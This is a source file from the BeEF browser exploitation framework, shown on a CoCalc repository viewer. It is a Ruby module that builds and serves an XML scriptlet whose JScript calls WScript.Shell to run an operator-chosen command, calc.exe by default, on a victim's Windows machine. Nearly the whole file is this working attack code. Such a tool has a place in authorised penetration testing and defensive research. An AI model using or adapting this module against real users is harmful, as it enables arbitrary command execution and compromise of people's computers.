Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/social_engineering/edge_wscript_wsh_injection/module.rb
1873 views
1
#

2
# Copyright (c) 2006-2026 Wade Alcorn - [email protected]

3
# Browser Exploitation Framework (BeEF) - https://beefproject.com

4
# See the file 'doc/COPYING' for copying permission

5
#

6
class Edge_wscript_wsh_injection < BeEF::Core::Command

7
  def pre_send

8
    payload = ''

9
    @datastore.each do |input|

10
      payload = input['value'] if input['name'] == 'payload'

11
    end

12


13
    rand_str = rand(32**10).to_s(32)

14


15
    script = <<~EOF

16
      <?XML version="1.0"?>#{'                                                                                           '}

17
        <scriptlet>

18


19
        <registration

20
          description="#{rand_str}"

21
          progid="#{rand_str}"

22
          version="1.00"

23
          classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"

24
          remotable="true"

25
        >

26
        </registration>

27


28
        <script language="JScript">

29
        <![CDATA[

30
          var r = new ActiveXObject("WScript.Shell").Run("#{payload.gsub('"', '\\"')}");

31
        ]]>

32
        </script>

33


34
        </scriptlet>

35
    EOF

36


37
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',

38
                                                                       {

39
                                                                         'Content-Type' => 'text/html'

40
                                                                       },

41
                                                                       script,

42
                                                                       "/#{@command_id}/index.html",

43
                                                                       -1)

44
  end

45


46
  def self.options

47
    [

48
      { 'name' => 'payload', 'ui_label' => 'Commands', 'value' => 'calc.exe' }

49
    ]

50
  end

51


52
  def post_execute

53
    save({ 'result' => @datastore['result'] })

54
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/#{@command_id}/index.html")

55
  end

56
end

57


58